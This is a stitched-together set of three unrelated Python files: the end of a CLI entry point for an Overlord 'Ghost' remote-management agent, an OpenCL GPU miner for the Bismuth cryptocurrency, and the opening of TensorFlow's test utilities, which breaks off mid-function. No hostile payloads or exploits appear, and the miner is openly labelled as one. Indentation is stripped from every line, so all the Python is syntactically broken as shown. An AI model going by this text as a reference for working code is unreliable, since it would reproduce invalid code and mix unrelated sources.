parser.add_argument('--track-connection', dest='track_connection',
default=None, choices=('y', 'n'),
help="specify 'y' or 'n' to track connection or not")
parser.add_argument('--timeout-seconds', dest='timeout_secs', type=int,
default=900,
help='timeout seconds when track the connection')
parser.add_argument('overlord_ip', metavar='OVERLORD_IP', type=str, nargs='*',
help='overlord server address')
args = parser.parse_args()
if args.status:
print(GhostRPCServer().GetStatus())
sys.exit()
if args.fork:
ForkToBackground()
if args.reset:
GhostRPCServer().Reconnect()
sys.exit()
if args.send_data:
GhostRPCServer().SendData()
sys.exit()
if args.track_connection:
GhostRPCServer().TrackConnection(args.track_connection == 'y',
args.timeout_secs)
sys.exit()
if args.download:
DownloadFile(args.download)
addrs = [('localhost', _OVERLORD_PORT)]
addrs = [(x, _OVERLORD_PORT) for x in args.overlord_ip] + addrs
prop_file = os.path.abspath(args.prop_file) if args.prop_file else None
tls_settings = TLSSettings(args.tls_cert_file, not args.tls_no_verify)
tls_mode = args.tls_mode
tls_mode = {'y': True, 'n': False, 'detect': None}[tls_mode]
g = Ghost(addrs, tls_settings, Ghost.AGENT, args.mid, prop_file=prop_file,
tls_mode=tls_mode, ovl_path=args.ovl_path,
certificate_dir=args.certificate_dir)
g.Start(args.lan_disc, args.rpc_server)
if __name__ == '__main__':
try:
main()
except Exception as e:
logging.error(e)
|
clminer.py
|
import options, time
import pyopencl as cl
import numpy as np
import threading, queue
# load config
config = options.Get()
config.read()
opencl_hash_count = config.opencl_hash_count_conf
opencl_timeout = config.opencl_timeout_conf
opencl_thread_multiplier = config.opencl_thread_multiplier_conf
opencl_disable_device = config.opencl_disable_device_conf
opencl_full_check = config.opencl_full_check_conf
# OpenCL classes
class oclResultQueue:
def __init__(self):
self.resultQueue_ = queue.Queue()
def getNextCandidate(self, timeout):
if timeout is not None and timeout <= 0:
return None, 0
try:
candidate = self.resultQueue_.get( timeout=timeout )
self.resultQueue_.task_done()
return candidate, self.resultQueue_.qsize()
except queue.Empty:
return None, 0
def pushCandidate(self, candidate):
self.resultQueue_.put( candidate )
class oclDevice:
def __init__(self, threadId, platId, devId, resultQueue):
self.devId_ = devId
self.platId_ = platId
self.thread_ = None
self.threadId_ = threadId
self.threadCount_ = 0
self.resultQueue_ = resultQueue
def getName( self ):
return self.device_.name
def getThreadCount( self ):
return self.threadCount_
def setupCL( self, hash_count ):
try:
self.platform_ = cl.get_platforms()[ self.platId_ ]
self.device_ = self.platform_.get_devices( device_type=cl.device_type.GPU )[ self.devId_ ]
self.threadCount_ = opencl_thread_multiplier * self.device_.max_work_group_size
self.hashCount_ = np.uint32( hash_count )
print( "Setuping OpenCL miner for {}...".format( self.getName() ) )
self.ctx_ = cl.Context( devices=[self.device_],
properties=[(cl.context_properties.PLATFORM, self.platform_)] )
assert self.ctx_ is not None
self.queue_ = cl.CommandQueue( context=self.ctx_, device=self.device_ )
assert self.queue_ is not None
self.header_ = cl.Buffer( self.ctx_, size=56, flags=cl.mem_flags.READ_ONLY )
assert self.header_ is not None
self.tail_ = cl.Buffer( self.ctx_, size=56, flags=cl.mem_flags.READ_ONLY )
assert self.tail_ is not None
threadCount = self.threadCount_
self.seed_ = cl.Buffer( self.ctx_, size=threadCount*8, flags=cl.mem_flags.READ_WRITE )
assert self.seed_ is not None
seed = np.random.bytes(threadCount*8)
cl.enqueue_copy( self.queue_, src=seed, dest=self.seed_ )
nonce0 = cl.Buffer( self.ctx_, size=self.retSize(), flags=cl.mem_flags.WRITE_ONLY )
assert nonce0 is not None
nonce1 = cl.Buffer( self.ctx_, size=self.retSize(), flags=cl.mem_flags.WRITE_ONLY )
assert nonce1 is not None
map0 = cl.Buffer( self.ctx_, size=self.retCount(), flags=cl.mem_flags.WRITE_ONLY )
assert map0 is not None
map1 = cl.Buffer( self.ctx_, size=self.retCount(), flags=cl.mem_flags.WRITE_ONLY )
assert map1 is not None
cnt0 = cl.Buffer( self.ctx_, size=4, flags=cl.mem_flags.READ_WRITE)
assert cnt0 is not None
cnt1 = cl.Buffer( self.ctx_, size=4, flags=cl.mem_flags.READ_WRITE)
assert cnt1 is not None
self.ret_ = [ nonce0, nonce1 ]
self.retMap_ = [ map0, map1 ]
self.retCnt_ = [ cnt0, cnt1 ]
with open("opencl/bismuth.cl", "r") as clfile:
source = clfile.read()
self.program_ = cl.Program( self.ctx_, source )
assert self.program_ is not None
print( "Compiling OpenCL low diffculty miner for {}...".format( self.getName() ) )
compileOp=[ "-cl-mad-enable", "-DHASH_COUNT={}".format(hash_count) ]
if opencl_full_check != 0:
compileOp.append( "-DBISMUTH_FULL_GPU_CHECK=1" )
self.program_.build( options=compileOp, devices=[ self.device_ ] )
#with open("bismuth.bin", "bw") as binfile:
# binfile.write( self.program_.binaries[0] )
kernel0 = self.program_.bismuth
assert kernel0 is not None
kernel1 = self.program_.bismuth
assert kernel1 is not None
self.kernelLow_ = [ kernel0, kernel1 ]
self.programHigh_ = cl.Program( self.ctx_, source )
print( "Compiling OpenCL high diffculty miner for {}...".format( self.getName() ) )
compileOp.append( "-DSEARCH_KEY_OVER_5=1" )
self.programHigh_.build( options=compileOp, devices=[ self.device_ ] )
kernelHi0 = self.programHigh_.bismuth
assert kernelHi0 is not None
kernelHi1 = self.programHigh_.bismuth
assert kernelHi1 is not None
self.kernelHigh_ = [ kernelHi0, kernelHi1 ]
self.retNonces_ = np.zeros( 4*self.retCount(), dtype='u4' )
self.retMaps_ = np.zeros( self.retCount(), dtype='B' )
except Exception as e:
print(e)
raise
def setKernelParams( self, key ):
self.key_ = key
self.kernelHigh_[0].set_args( self.header_, self.tail_,
self.seed_, self.hashCount_, key,
self.retCnt_[0],
self.ret_[0], self.retMap_[0] )
self.kernelHigh_[1].set_args( self.header_, self.tail_,
self.seed_, self.hashCount_, key,
self.retCnt_[1],
self.ret_[1], self.retMap_[1] )
self.kernelLow_[0].set_args( self.header_, self.tail_,
self.seed_, self.hashCount_, key,
self.retCnt_[0],
self.ret_[0], self.retMap_[0] )
self.kernelLow_[1].set_args( self.header_, self.tail_,
self.seed_, self.hashCount_, key,
self.retCnt_[1],
self.ret_[1], self.retMap_[1] )
self.kernel_ = self.kernelLow_ if key < 80 else self.kernelHigh_
def setHeader(self, header):
cl.enqueue_copy( self.queue_, src=header, dest=self.header_ )
def setTail(self, tail):
cl.enqueue_copy( self.queue_, src=tail, dest=self.tail_ )
self.label_ = tail[:10].decode("utf-8")
def readReturn( self, idx ):
ev0 = cl.enqueue_copy( self.queue_, src=self.ret_[ idx ], dest=self.retNonces_, is_blocking=False )
ev1 = cl.enqueue_copy( self.queue_, src=self.retMap_[ idx ], dest=self.retMaps_, is_blocking=False )
cl.wait_for_events( [ ev0, ev1 ] )
return self.retMaps_, self.retNonces_
def readCount( self, idx, waitev ):
ret = np.zeros( 1, dtype='u4' )
readev = cl.enqueue_copy( self.queue_, src=self.retCnt_[ idx ], dest=ret, is_blocking=False, wait_for=[waitev])
return readev, ret
def runFirst( self, idx ):
fillev = cl.enqueue_fill_buffer( self.queue_, self.retCnt_[ idx ],
np.uint8(0), 0, 4 )
runev = cl.enqueue_nd_range_kernel( self.queue_, self.kernel_[ idx ],
(self.threadCount_,), None, wait_for=[fillev] )
self.queue_.flush()
return runev
def run( self, idx, runev ):
fillev = cl.enqueue_fill_buffer( self.queue_, self.retCnt_[ idx ],
np.uint8(0), 0, 4 )
runev = cl.enqueue_nd_range_kernel( self.queue_, self.kernel_[ idx ],
(self.threadCount_,), None, wait_for=[fillev, runev] )
self.queue_.flush()
return runev
def retCount(self):
return self.threadCount_
def hashCount(self):
return self.hashCount_ * self.retCount()
def retSize(self):
return self.retCount() * 16
#@profile
def processLoop(self):
loop = 0
looptime = 0
runev0 = self.runFirst( 0 )
while self.running_:
start = time.time()
# While CPU checks hashes, GPU generate more
# Finished ID0, so start ID1
readev0, ret0 = self.readCount( 0, runev0 )
runev1 = self.run( 1, runev0 )
readev0.wait()
if self.running_ == False:
break
if ret0[0] > 0:
map, nonce = self.readReturn( 0 )
index = map.nonzero()[0]
for idx in index:
nidx = idx*4
#print( "(python) Found on index {}".format( nidx ) )
self.resultQueue_.pushCandidate( [nonce[ nidx: nidx+4 ].copy(),
self.threadId_] )
# Finished ID1, so start ID0
readev1, ret1 = self.readCount( 0, runev1 )
runev0 = self.run( 0, runev1 )
readev1.wait()
if self.running_ == False:
break
if ret1[0] > 0:
map, nonce = self.readReturn( 1 )
index = map.nonzero()[0]
for idx in index:
nidx = idx*4
#print( "(python) Found on index {}".format( nidx ) )
self.resultQueue_.pushCandidate( [nonce[ nidx: nidx+4 ].copy(),
self.threadId_] )
end = time.time()
looptime += end - start
loop = loop + 1
if (loop & 1) == 0:
hashesCnt = loop * 2 * self.hashCount()
cycles_per_second = hashesCnt/looptime
print( "Thread{} {} @ {:,.4f} sec, {:,.2f} cycles/second, hashes: {:,}".format(
self.threadId_, self.label_, looptime, cycles_per_second, hashesCnt ) )
loop = 0
looptime = 0
def startMining(self):
if self.thread_ is None:
self.running_ = True
self.thread_ = threading.Thread( target=self.processLoop )
self.thread_.start()
def stopMining(self):
self.running_ = False
self.thread_.join()
class ocl:
def __init__(self):
self.devices_ = []
def setupCL(self, resultQueue):
platId = 0
i = 0
print( "Searching for OpenCL devices..." )
platforms = cl.get_platforms()
for plat in platforms:
devId = 0
devs = plat.get_devices( device_type=cl.device_type.GPU )
for dev in devs:
print( "Device {}: {} ({} threads)".format( i, dev.name, dev.max_work_group_size ) )
self.devices_.append( oclDevice( i+1, platId, devId, resultQueue ) )
i = i + 1
devId = devId + 1
platId = platId + 1
if len(self.devices_) == 0:
print( "No OpenCL devices found" )
return
print( "{} OpenCL devices found".format( len(self.devices_) ) )
def getDevices(self):
return [dev for dev in range(len(self.devices_)) if dev not in opencl_disable_device]
def getMiners(self):
instances = self.getDevices()
miners = []
for q in instances:
m = self.getDevice(q)
m.setupCL( opencl_hash_count )
miners.append( m )
print("thread " + str(q+1) + " started")
return miners
def getDevice(self, idx):
return self.devices_[ idx ]
def getTimeout(self):
return opencl_timeout
# OpenCL classes
|
test_util.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""Test utils for tensorflow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from collections import OrderedDict
import contextlib
import functools
import gc
import itertools
import math
import os
import random
import re
import tempfile
import threading
import unittest
from absl.testing import parameterized
import numpy as np
import six
_portpicker_import_error = None
try:
import portpicker # pylint: disable=g-import-not-at-top
except ImportError as _error:
_portpicker_import_error = _error
portpicker = None
# pylint: disable=g-import-not-at-top
from google.protobuf import descriptor_pool
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python import _pywrap_stacktrace_handler
from tensorflow.python import _pywrap_util_port
from tensorflow.python import pywrap_tensorflow
from tensorflow.python import tf2
from tensorflow.python.client import device_lib
from tensorflow.python.client import session
from tensorflow.python.compat.compat import forward_compatibility_horizon
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.eager import tape
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import importer
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_util
from tensorflow.python.ops import control_flow_util_v2
from tensorflow.python.ops.ragged import ragged_tensor
from tensorflow.python.ops.ragged import ragged_tensor_value
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import summary_ops_v2
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import server_lib
from tensorflow.python.util import compat
from tensorflow.python.util import deprecation
from tensorflow.python.util import nest
from tensorflow.python.util import tf_decorator
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.protobuf import compare
from tensorflow.python.util.tf_export import tf_export
from tensorflow.python.util.compat import collections_abc
# If the below import is made available through the BUILD rule, then this
# function is overridden and will instead return True and cause Tensorflow
# graphs to be compiled with XLA.
def is_xla_enabled():
return False
try:
from tensorflow.python.framework.is_xla_test_true import is_xla_enabled # pylint: disable=g-import-not-at-top
except:
pass
@tf_export("test.gpu_device_name")
def gpu_device_name():
"""Returns the name of a GPU device if available or the empty string."""
for x in device_lib.list_local_devices():
if x.device_type == "GPU" or x.device_type == "SYCL":
return compat.as_str(x.name)
return ""
def assert_ops_in_graph(expected_ops, graph):
"""Assert all expected operations are found.
Args:
expected_ops: `dict<string, string>` of op name to op type.
graph: Graph to check.
Returns:
`dict<string, node>` of node name to node.
Raises:
ValueError: If the expected ops are not present in the graph.
"""
actual_ops = {}
gd = graph.as_graph_def()
for node in gd.node:
if node.name in expected_ops:
if expected_ops[node.name] != node.op:
raise ValueError("Expected op for node %s is different. %s vs %s" %
(node.name, expected_ops[node.name], node.op))
actual_ops[node.name] = node
if set(expected_ops.keys()) != set(actual_ops.keys()):
raise ValueError("Not all expected ops are present. Expected %s, found %s" %
(expected_ops.keys(), actual_ops.keys()))
return actual_ops
@tf_export("test.assert_equal_graph_def", v1=[])
def assert_equal_graph_def_v2(expected, actual):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent. This function
ignores randomized attribute values that may appear in V2 checkpoints.
Args:
expected: The `GraphDef` we expected.
actual: The `GraphDef` we have.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
assert_equal_graph_def(actual, expected, checkpoint_v2=True,
hash_table_shared_name=True)
@tf_export(v1=["test.assert_equal_graph_def"])
def assert_equal_graph_def_v1(actual, expected, checkpoint_v2=False,
hash_table_shared_name=False):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent.
Args:
actual: The `GraphDef` we have.
expected: The `GraphDef` we expected.
checkpoint_v2: boolean determining whether to ignore randomized attribute
values that appear in V2 checkpoints.
hash_table_shared_name: boolean determining whether to ignore randomized
shared_names that appear in HashTableV2 op defs.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
assert_equal_graph_def(actual, expected, checkpoint_v2,
hash_table_shared_name)
def assert_equal_graph_def(actual, expected, checkpoint_v2=False,
hash_table_shared_name=False):
if not isinstance(actual, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for actual, got %s" %
type(actual).__name__)
if not isinstance(expected, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for expected, got %s" %
type(expected).__name__)
if checkpoint_v2:
_strip_checkpoint_v2_randomized(actual)
_strip_checkpoint_v2_randomized(expected)
if hash_table_shared_name:
_strip_hash_table_shared_name(actual)
_strip_hash_table_shared_name(expected)
diff = pywrap_tensorflow.EqualGraphDefWrapper(actual.SerializeToString(),
expected.SerializeToString())
if diff:
raise AssertionError(compat.as_str(diff))
def assert_meta_graph_protos_equal(tester, a, b):
"""Compares MetaGraphDefs `a` and `b` in unit test class `tester`."""
# Carefully check the collection_defs
tester.assertEqual(set(a.collection_def), set(b.collection_def))
collection_keys = a.collection_def.keys()
for k in collection_keys:
a_value = a.collection_def[k]
b_value = b.collection_def[k]
proto_type = ops.get_collection_proto_type(k)
if proto_type:
a_proto = proto_type()
b_proto = proto_type()
# Number of entries in the collections is the same
tester.assertEqual(
len(a_value.bytes_list.value), len(b_value.bytes_list.value))
for (a_value_item, b_value_item) in zip(a_value.bytes_list.value,
b_value.bytes_list.value):
a_proto.ParseFromString(a_value_item)
b_proto.ParseFromString(b_value_item)
tester.assertProtoEquals(a_proto, b_proto)
else:
tester.assertEquals(a_value, b_value)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("collection_def")
b.ClearField("collection_def")
# Check the graph_defs.
assert_equal_graph_def(a.graph_def, b.graph_def, checkpoint_v2=True)
# Check graph_def versions (ignored by assert_equal_graph_def).
tester.assertProtoEquals(a.graph_def.versions, b.graph_def.versions)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("graph_def")
b.ClearField("graph_def")
tester.assertProtoEquals(a, b)
# Matches attributes named via _SHARDED_SUFFIX in
# tensorflow/python/training/saver.py
_SHARDED_SAVE_OP_PATTERN = "_temp_[0-9a-z]{32}/part"
def _strip_checkpoint_v2_randomized(graph_def):
for node in graph_def.node:
delete_keys = []
for attr_key in node.attr:
attr_tensor_value = node.attr[attr_key].tensor
if attr_tensor_value and len(attr_tensor_value.string_val) == 1:
attr_tensor_string_value = attr_tensor_value.string_val[0]
if (attr_tensor_string_value and
re.match(_SHARDED_SAVE_OP_PATTERN, str(attr_tensor_string_value))):
delete_keys.append(attr_key)
for attr_key in delete_keys:
del node.attr[attr_key]
_TABLE_SHARED_NAME_PATTERN = r"hash_table_[0-9a-z\-]+"
def _strip_hash_table_shared_name(graph_def):
for node in graph_def.node:
delete_keys = []
if node.op == "HashTableV2" and "shared_name" in node.attr:
if re.match(_TABLE_SHARED_NAME_PATTERN, str(node.attr["shared_name"].s)):
delete_keys.append("shared_name")
for attr_key in delete_keys:
del node.attr[attr_key]
def IsGoogleCudaEnabled():
return _pywrap_util_port.IsGoogleCudaEnabled()
def IsBuiltWithROCm():
return _pywrap_util_port.IsBuiltWithROCm()
def IsBuiltWithNvcc():
return _pywrap_util_port.IsBuiltWithNvcc()
def GpuSupportsHalfMatMulAndConv():
return _pywrap_util_port.GpuSupportsHalfMatMulAndConv()
def IsMklEnabled():
return _pywrap_util_port.IsMklEnabled()
def InstallStackTraceHandler():
_pywrap_stacktrace_handler.InstallStacktraceHandler()
def NHWCToNCHW(input_tensor):
"""Converts the input from the NHWC format to NCHW.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 3, 1, 2], 5: [0, 4, 1, 2, 3]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def NHWCToNCHW_VECT_C(input_shape_or_tensor):
"""Transforms the input from the NHWC layout to NCHW_VECT_C layout.
Note: Does not include quantization or type conversion steps, which should
be applied afterwards.
Args:
input_shape_or_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NCHW_VECT_C
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not evenly
divisible by 4.
"""
permutations = {5: [0, 3, 1, 2, 4], 6: [0, 4, 1, 2, 3, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
temp_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if temp_shape[-1] % 4 != 0:
raise ValueError(
"Last dimension of input must be evenly divisible by 4 to convert to "
"NCHW_VECT_C.")
temp_shape[-1] //= 4
temp_shape.append(4)
permutation = permutations[len(temp_shape)]
if is_tensor:
t = array_ops.reshape(input_shape_or_tensor, temp_shape)
return array_ops.transpose(t, permutation)
else:
return [temp_shape[a] for a in permutation]
def NCHW_VECT_CToNHWC(input_shape_or_tensor):
"""Transforms the input from the NCHW_VECT_C layout to NHWC layout.
Note: Does not include de-quantization or type conversion steps, which should
be applied beforehand.
Args:
input_shape_or_tensor: a 5- or 6-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NHWC
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not 4.
"""
permutations = {5: [0, 2, 3, 1, 4], 6: [0, 2, 3, 4, 1, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
input_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if input_shape[-1] != 4:
raise ValueError("Last dimension of NCHW_VECT_C must be 4.")
permutation = permutations[len(input_shape)]
nhwc_shape = [input_shape[a] for a in permutation[:-1]]
nhwc_shape[-1] *= input_shape[-1]
if is_tensor:
t = array_ops.transpose(input_shape_or_tensor, permutation)
return array_ops.reshape(t, nhwc_shape)
else:
return nhwc_shape
def NCHWToNHWC(input_tensor):
"""Converts the input from the NCHW format to NHWC.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 2, 3, 1], 5: [0, 2, 3, 4, 1]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def skip_if(condition):
"""Skips the decorated function if condition is or evaluates to True.
Args:
condition: Either an expression that can be used in "if not condition"
statement, or a callable whose result should be a boolean.
Returns:
The wrapped function
"""
def real_skip_if(fn):
def wrapper(*args, **kwargs):
if callable(condition):
skip = condition()
else:
skip = condition
if not skip:
return fn(*args, **kwargs)
return wrapper
return real_skip_if
def enable_c_shapes(fn):
"""No-op. TODO(b/74620627): Remove this."""
return fn
def with_c_shapes(cls):
"""No-op. TODO(b/74620627): Remove this."""
return cls
def enable_control_flow_v2(fn):
"""Decorator for enabling CondV2 and WhileV2 on a test.
Note this enables using CondV2 and WhileV2 after running the test class's
setup/teardown methods.
In addition to this, callers must import the while_v2 module in order to set
the _while_v2 module in control_flow_ops.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
enable_control_flow_v2_old = control_flow_util.ENABLE_CONTROL_FLOW_V2
control_flow_util.ENABLE_CONTROL_FLOW_V2 = True
try:
return fn(*args, **kwargs)
finally:
control_flow_util.ENABLE_CONTROL_FLOW_V2 = enable_control_flow_v2_old
return wrapper
def with_control_flow_v2(cls):
"""Adds methods that call original methods with WhileV2 and CondV2 enabled.
Note this enables CondV2 and WhileV2 in new methods after running the test
class's setup method.
In addition to this, callers must import the while_v2 module in order to set
the _while_v2 module in control_flow_ops.
If a test function has _disable_control_flow_v2 attr set to True (using the
@disable_control_flow_v2 decorator), the v2 function is not generated for it.
Example:
@test_util.with_control_flow_v2
class ControlFlowTest(test.TestCase):
def testEnabledForV2(self):
...
@test_util.disable_control_flow_v2("b/xyzabc")
def testDisabledForV2(self):
...
Generated class:
class ControlFlowTest(test.TestCase):
def testEnabledForV2(self):
...
def testEnabledForV2WithControlFlowV2(self):
// Enable V2 flags.
testEnabledForV2(self)
// Restore V2 flags.
def testDisabledForV2(self):
...
Args:
cls: class to decorate
Returns:
cls with new test methods added
"""
if control_flow_util.ENABLE_CONTROL_FLOW_V2:
return cls
for name, value in cls.__dict__.copy().items():
if (callable(value) and
name.startswith(unittest.TestLoader.testMethodPrefix) and
not getattr(value, "_disable_control_flow_v2", False)):
setattr(cls, name + "WithControlFlowV2", enable_control_flow_v2(value))
return cls
def disable_control_flow_v2(unused_msg):
"""Decorator for a function in a with_control_flow_v2 enabled test class.
Blocks the function from being run with v2 control flow ops.
Args:
unused_msg: Reason for disabling.
Returns:
The wrapped function with _disable_control_flow_v2 attr set to True.
"""
def wrapper(func):
func._disable_control_flow_v2 = True
return func
return wrapper
def enable_output_all_intermediates(fn):
"""Force-enable outputing all intermediates from functional control flow ops.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
output_all_intermediates_old = \
control_flow_util_v2._EXPERIMENTAL_OUTPUT_ALL_INTERMEDIATES_OVERRIDE
control_flow_util_v2._EXPERIMENTAL_OUTPUT_ALL_INTERMEDIATES_OVERRIDE = True
try:
return fn(*args, **kwargs)
finally:
control_flow_util_v2._EXPERIMENTAL_OUTPUT_ALL_INTERMEDIATES_OVERRIDE = \
output_all_intermediates_old
return wrapper
def assert_no_new_pyobjects_executing_eagerly(f):
"""Decorator for asserting that no new Python objects persist after a test.
Runs the test multiple times executing eagerly, first as a warmup and then to
let objects accumulate. The warmup helps ignore caches which do not grow as
the test is run repeatedly.
Useful for checking that there are no missing Py_DECREFs in the C exercised by
a bit of Python.
"""
def decorator(self, *args, **kwargs):
"""Warms up, gets an object count, runs the test, checks for new objects."""
with context.eager_mode():
gc.disable()
# Run the test 2 times as warmup, in an attempt to fill up caches, which
# should not grow as the test is run repeatedly below.
#
# TODO(b/117156879): Running warmup twice is black magic; we have seen
# tests that fail with 1 warmup run, and pass with 2, on various versions
# of python2.7.x.
for _ in range(2):
f(self, *args, **kwargs)
gc.collect()
previous_count = len(gc.get_objects())
if ops.has_default_graph():
collection_sizes_before = {
collection: len(ops.get_collection(collection))
for collection in ops.get_default_graph().collections
}
for _ in range(3):
f(self, *args, **kwargs)
# Note that gc.get_objects misses anything that isn't subject to garbage
# collection (C types). Collections are a common source of leaks, so we
# test for collection sizes explicitly.
if ops.has_default_graph():
for collection_key in ops.get_default_graph().collections:
collection = ops.get_collection(collection_key)
size_before = collection_sizes_before.get(collection_key, 0)
if len(collection) > size_before:
raise AssertionError(
("Collection %s increased in size from "
"%d to %d (current items %s).") %
(collection_key, size_before, len(collection), collection))
# Make sure our collection checks don't show up as leaked memory by
# removing references to temporary variables.
del collection
del collection_key
del size_before
del collection_sizes_before
gc.collect()
# There should be no new Python objects hanging around.
new_count = len(gc.get_objects())
# In some cases (specifacally on MacOS), new_count is somehow
# smaller than previous_count.
# Using plain assert because not all classes using this decorator
# have assertLessEqual
assert new_count <= previous_count, (
"new_count(%d) is not less than or equal to previous_count(%d)" %
(new_count, previous_count))
gc.enable()
return decorator
def assert_no_new_tensors(f):
"""Decorator for asserting that no new Tensors persist after a test.
Mainly useful for checking that code using the Python C API has correctly
manipulated reference counts.
Clears the caches that it knows about, runs the garbage collector, then checks
that there are no Tensor or Tensor-like objects still around. This includes
Tensors to which something still has a reference (e.g. from missing
Py_DECREFs) and uncollectable cycles (i.e. Python reference cycles where one
of the objects has __del__ defined).
Args:
f: The test case to run.
Returns:
The decorated test case.
"""
def decorator(self, **kwargs):
"""Finds existing Tensors, runs the test, checks for new Tensors."""
def _is_tensorflow_object(obj):
try:
return isinstance(obj,
(ops.Tensor, variables.Variable,
tensor_shape.Dimension, tensor_shape.TensorShape))
except ReferenceError:
# If the object no longer exists, we don't care about it.
return False
tensors_before = set(
id(obj) for obj in gc.get_objects() if _is_tensorflow_object(obj))
outside_executed_eagerly = context.executing_eagerly()
# Run the test in a new graph so that collections get cleared when it's
# done, but inherit the graph key so optimizers behave.
outside_graph_key = ops.get_default_graph()._graph_key
with ops.Graph().as_default():
ops.get_default_graph()._graph_key = outside_graph_key
if outside_executed_eagerly:
with context.eager_mode():
result = f(self, **kwargs)
else:
result = f(self, **kwargs)
# Make an effort to clear caches, which would otherwise look like leaked
# Tensors.
context.context()._clear_caches() # pylint: disable=protected-access
gc.collect()
tensors_after = [
obj for obj in gc.get_objects()
if _is_tensorflow_object(obj) and id(obj) not in tensors_before
]
if tensors_after:
raise AssertionError(("%d Tensors not deallocated after test: %s" % (
len(tensors_after),
str(tensors_after),
)))
return result
return decorator
def _find_reference_cycle(objects, idx):
def get_ignore_reason(obj, blacklist):
"""Tests whether an object should be omitted from the dependency graph."""
if len(blacklist) > 100:
return "<depth limit>"
if tf_inspect.isframe(obj):
if "test_util.py" in tf_inspect.getframeinfo(obj)[0]:
return "<test code>"
for b in blacklist:
if b is obj:
return "<test code>"
if obj is blacklist:
return "<test code>"
return None
# Note: this function is meant to help with diagnostics. Its output is purely
# a human-readable representation, so you may freely modify it to suit your
# needs.
def describe(obj, blacklist, leaves_only=False):
"""Returns a custom human-readable summary of obj.
Args:
obj: the value to describe.
blacklist: same as blacklist in get_ignore_reason.
leaves_only: boolean flag used when calling describe recursively. Useful
for summarizing collections.
"""
if get_ignore_reason(obj, blacklist):
return "{}{}".format(get_ignore_reason(obj, blacklist), type(obj))
if tf_inspect.isframe(obj):
return "frame: {}".format(tf_inspect.getframeinfo(obj))
elif tf_inspect.ismodule(obj):
return "module: {}".format(obj.__name__)
else:
if leaves_only:
return "{}, {}".format(type(obj), id(obj))
elif isinstance(obj, list):
return "list({}): {}".format(
id(obj), [describe(e, blacklist, leaves_only=True) for e in obj])
elif isinstance(obj, tuple):
return "tuple({}): {}".format(
id(obj), [describe(e, blacklist, leaves_only=True) for e in obj])
elif isinstance(obj, dict):
return "dict({}): {} keys".format(id(obj), len(obj.keys()))
elif tf_inspect.isfunction(obj):
return "function({}) {}; globals ID: {}".format(
id(obj), obj.__name__, id(obj.__globals__))
else:
return "{}, {}".format(type(obj), id(obj))
def build_ref_graph(obj, graph, reprs, blacklist):
"""Builds a reference graph as <referrer> -> <list of refferents>.
Args:
obj: The object to start from. The graph will be built by recursively
adding its referrers.
graph: Dict holding the graph to be built. To avoid creating extra
references, the graph holds object IDs rather than actual objects.
reprs: Auxiliary structure that maps object IDs to their human-readable
description.
blacklist: List of objects to ignore.
"""
referrers = gc.get_referrers(obj)
blacklist = blacklist + (referrers,)
obj_id = id(obj)
for r in referrers:
if get_ignore_reason(r, blacklist) is None:
r_id = id(r)
if r_id not in graph:
graph[r_id] = []
if obj_id not in graph[r_id]:
